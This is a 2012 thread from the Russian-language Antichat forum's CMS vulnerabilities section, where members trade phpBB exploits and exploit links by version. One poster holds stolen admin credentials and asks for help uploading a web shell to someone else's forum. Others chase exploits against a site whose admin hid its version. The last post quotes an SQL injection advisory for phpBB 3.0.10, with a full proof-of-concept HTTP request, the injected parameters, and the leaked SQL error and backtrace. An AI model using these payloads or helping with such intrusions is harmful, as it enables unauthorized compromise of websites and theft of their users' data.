HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 22.01.2012, 00:19
SecondLife
Guest
Сообщений: n/a
Провел на форуме:
5997

Репутация: 21
По умолчанию

faza02, стукни в 433230838, помогу залить.
 
Ответить с цитированием

  #72  
Старый 22.01.2012, 04:48
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию

есть чо под 3,0,7?
 
Ответить с цитированием

  #73  
Старый 22.01.2012, 07:12
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

justonline,

http://www.exploit-db.com/exploits/2007/

http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/

SecondLife, отписал.
 
Ответить с цитированием

  #74  
Старый 27.01.2012, 18:53
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

сплоит на 2.0.17 скиньте плиз... тот что на 1 странице, линк дохлый
 
Ответить с цитированием

  #75  
Старый 29.01.2012, 03:10
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

Цитата:
Сообщение от Osstudio  
Osstudio said:
сплоит на 2.0.17 скиньте плиз... тот что на 1 странице, линк дохлый
тыц

больше ничего не нашел.
 
Ответить с цитированием

  #76  
Старый 17.06.2012, 04:20
tvmaudit
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Как решить проблему.

Есть база данных, в ней имеется отдельная бд в этой бд phpbb. Думаю залить шелл т/к/ данные админа на руках. Проблема в том что не могу найти урл форума.

Как узнать урл форума если ты в бд форума ?

Пробовал вытащить название темы и поискать в гуугле, но результат не получен. Пробовал так же искать из phpbb_sitelist там записей 0.
 
Ответить с цитированием

  #77  
Старый 04.07.2012, 16:32
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Phpbb 3.0 memberlist.php SQL injection

to ex'pert

Попробуйте данный сплойт

Цитата:
Сообщение от None  
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных параметра "ip" в скрипте memberlist.php
Phpbb 3.0 memberlist.php SQL injection
 
Ответить с цитированием

  #78  
Старый 04.07.2012, 17:07
ex'pert
Guest
Сообщений: n/a
Провел на форуме:
6871

Репутация: -3
По умолчанию

cat1vo, спасибо! Однако порылся в других файлах сайта и оказалось что там версия 3.0.10 на самом деле((. Админ изначально пытался скрыть, но я нашел истинную версию форума. На ней старый експлоит не работает. Теперь подскажите пожалуйста на новую)
 
Ответить с цитированием

  #79  
Старый 07.08.2012, 23:39
ex'pert
Guest
Сообщений: n/a
Провел на форуме:
6871

Репутация: -3
По умолчанию

есть что то новое под 3.0.10 ?
 
Ответить с цитированием

  #80  
Старый 07.08.2012, 23:54
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от ex'pert  
ex'pert said:
есть что то новое под 3.0.10 ?
Name : phpBB3 SQL Injection

------------------------------------------------------------------

Date : 27.07.2012

------------------------------------------------------------------

Site : www.phpbb.com

------------------------------------------------------------------

Version : 3.0.10

------------------------------------------------------------------

1) What is it?

This is very nice forum board. You should try it!

------------------------------------------------------------------

2) Type of bug?

SQL Injection (or SQL-info-Leak if You want).

------------------------------------------------------------------

3) Where is the bug?

Vulnerable parameter seems to be 'style' because if we set up this parameter

to 'bigger number' (for example: 111111111) we will get an error, with full SQL

statement.

*updated - dateformat is the second vulnerable parameter!

*updated - post_st is the 3rd vulnerable parameter!

*updated - another one: topic_st

4) PoC traffic from Burp:

4.1) Request :

---

POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174

Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=

Content-Type: application/x-www-form-urlencoded

Content-Length: 258

Connection: close

viewemail=1

&massemail=1

&allowpm=1

&hideonline=0

&notifypm=1

&popuppm=0

&lang=en

&style=%2b1111111111

&tz=0

&dst=0

&dateoptions=D+M+d%2C+Y+g%3Ai+a

&dateformat=D+M+d%2C+Y+g%3Ai+a

&submit=Submit

&creation_time=1343370877

&form_token=576...

---

4.2) Response:

---

HTTP/1.1 503 Service Unavailable

Date: Fri, 27 Jul 2012 06:39:06 GMT

Server: Apache/2.2.22 (Ubuntu)

X-Powered-By: PHP/5.3.10-1ubuntu3.2

Vary: Accept-Encoding

Connection: close

Content-Type: text/html

Content-Length: 2889

Return to the index page

General Error

SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users

SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,

user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,

user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111

WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

---

4.2 Other response (this time from post_st parameter):

---





Return to the index page



General Error

SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.

Please contact the
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21
Google Code Search облегчит хакерам задачу по поиску уязвимостей Lany Мировые новости. Обсуждения. 4 16.10.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ